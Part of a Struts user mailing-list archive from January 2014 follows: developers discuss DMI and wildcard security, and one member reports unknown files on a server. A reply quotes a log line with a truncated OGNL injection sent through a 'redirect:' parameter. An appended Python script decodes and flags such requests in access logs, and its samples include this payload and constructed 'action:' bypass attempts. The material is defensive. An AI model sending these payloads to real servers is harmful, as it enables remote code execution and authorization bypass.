Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

2014-01-30 Thread Salvatore Lionetti
Code has parent[s] (just like our children) that take special care of it. But code influence (positive or negative) is spread among all people. Open Licenses (like Apache2) code is especially so because it lets every one of us "adopt" or contribute to "a code". Moreover code is developed not only

Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

2014-01-30 Thread Fabian Richter
On 30.01.2014 06:57, Lukasz Lenart wrote:
> Do not depend only on container authentication mechanism.

So you would discourage the use of something like Spring Security as a sole authentication mechanism? Why?

Best
Fabian

Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

2014-01-30 Thread Lukasz Lenart
2014-01-30 Fabian Richter:
> On 30.01.2014 06:57, Lukasz Lenart wrote:
>> Do not depend only on container authentication mechanism.
>
> So you would discourage the use of something like Spring Security as a sole authentication mechanism? Why?

You missed out the context - action: prefix vulnerabili

Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

2014-01-30 Thread Manuel López Blasi
Thank you very much to all of you for taking the time to answer my questions, I have a clearer view of my situation now. Eric: I believe I understand your point, it's best for security-related stuff to be tailored to each individual project's needs, there's no way to be 100% sure of one's invuln

Security Issues & Vulnerability

2014-01-30 Thread Amol Ghotankar
I have seen some sample app for testing which was developed using struts2. I saw some unknown files getting uploaded on test; I initially thought that my tomcat was hacked or my server was hacked, but now after a close analysis it looks like a struts2 webwork security issue or vulnerability, or maybe my

Re: Security Issues & Vulnerability

2014-01-30 Thread JOSE L MARTINEZ-AVIAL
What version of Struts are you using? It seems

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.disp

Re: Security Issues & Vulnerability

2014-01-30 Thread Greuel, Jim
This is the vulnerability that was addressed in Struts 2.3.15.1.

On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL wrote:
> What version of Struts are you using? It seems
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
> /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.
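As an added example (not code from this thread or from the Struts project), the following Python log-triage helper shows what the request Jose quoted actually does and why Lukasz's warning about relying on container authentication alone applies. It URL-decodes request targets, pulls out the parameter names Struts 2 / XWork interprets as dispatch prefixes (`action:`, `redirect:`, `redirectAction:`, `method:`), flags redirect targets that carry OGNL delimiters (the S2-016 pattern in the quoted log line), and reports when an `action:`/`method:` prefix or a DMI `!method` in the path changes which action runs without changing the URL path a container security constraint would have matched. The first sample target is the request from the quoted log line, left truncated exactly as it is on the page; the other targets, including `/public/login.action?action:adminReport` and `/admin/report!export.action`, are constructed for this example. Function names are mine, not a Struts API.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample request targets (path + query) as they would appear in an
# access log. SAMPLE_TARGETS[0] is the request from the log line quoted in the
# thread, truncated exactly as it is on the page; the rest are made up here.
SAMPLE_TARGETS = [
    "/common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.disp",
    "/common/test2.action?id=42&name=bob",
    "/public/login.action?action:adminReport",
    "/common/test2.action?redirectAction:%25%7B%23x%3d1%7D",
    "/admin/report!export.action?format=csv",
]

# Parameter-name prefixes that Struts 2 / XWork treats as dispatch instructions.
# Everything after the prefix is the target; the parameter's value is ignored.
STRUTS_PREFIXES = ("redirectAction:", "redirect:", "action:", "method:")

# OGNL expression delimiters. A redirect target has no legitimate reason to
# contain them; in the affected versions they were evaluated server-side.
OGNL_MARKERS = ("${", "%{")

# Dynamic Method Invocation (DMI) "bang" syntax: /someAction!someMethod.action
DMI_BANG = re.compile(r"!([A-Za-z_]\w*)\.action$")


def prefixed_params(request_target):
    """Return [(prefix, decoded_target), ...] for every prefixed parameter name."""
    query = urlsplit(request_target).query
    found = []
    for pair in query.split("&"):
        if not pair:
            continue
        # The prefix lives in the parameter *name*, so split off any value first,
        # then percent-decode. Decoding after the split keeps an encoded '=' or
        # '&' inside the name from being mistaken for a separator.
        name = unquote(pair.split("=", 1)[0])
        for prefix in STRUTS_PREFIXES:
            if name.startswith(prefix):
                found.append((prefix, name[len(prefix):]))
                break
    return found


def classify(request_target):
    """Describe what the request really dispatches to and whether it looks like
    a redirect-prefix OGNL injection."""
    path = urlsplit(request_target).path
    prefixed = prefixed_params(request_target)
    dmi_target = None          # action/method chosen by a parameter or bang, not by the path
    ognl_in_redirect = False
    for prefix, target in prefixed:
        if prefix in ("action:", "method:"):
            dmi_target = target
        elif any(marker in target for marker in OGNL_MARKERS):
            ognl_in_redirect = True
    bang = DMI_BANG.search(path)
    if bang:
        dmi_target = bang.group(1)
    return {
        "path": path,
        "prefixed": prefixed,
        "dmi_target": dmi_target,
        "ognl_in_redirect": ognl_in_redirect,
        # Any diversion at all is worth a look: it means the executed action or
        # method is not the one a path-based security constraint in web.xml saw.
        "suspicious": ognl_in_redirect or dmi_target is not None,
    }


def flag_requests(targets):
    """Indices of the targets that deserve analyst attention."""
    return [i for i, t in enumerate(targets) if classify(t)["suspicious"]]


if __name__ == "__main__":
    for i in flag_requests(SAMPLE_TARGETS):
        info = classify(SAMPLE_TARGETS[i])
        print(f"[{i}] {info['path']}  dmi_target={info['dmi_target']}  "
              f"ognl={info['ognl_in_redirect']}  prefixes={[p for p, _ in info['prefixed']]}")
```

Run against the samples, the quoted request is flagged because its `redirect:` target decodes to `${#a=#context.get(...` and the constructed `action:adminReport` request is flagged even though its path is `/public/login.action`, which is the case a URL-pattern constraint cannot catch; the fix on the framework side is the one Jim names (upgrade past 2.3.15.1 and keep DMI and the prefix parameters disabled), and the application-side check belongs in the action or an interceptor, not only in the container.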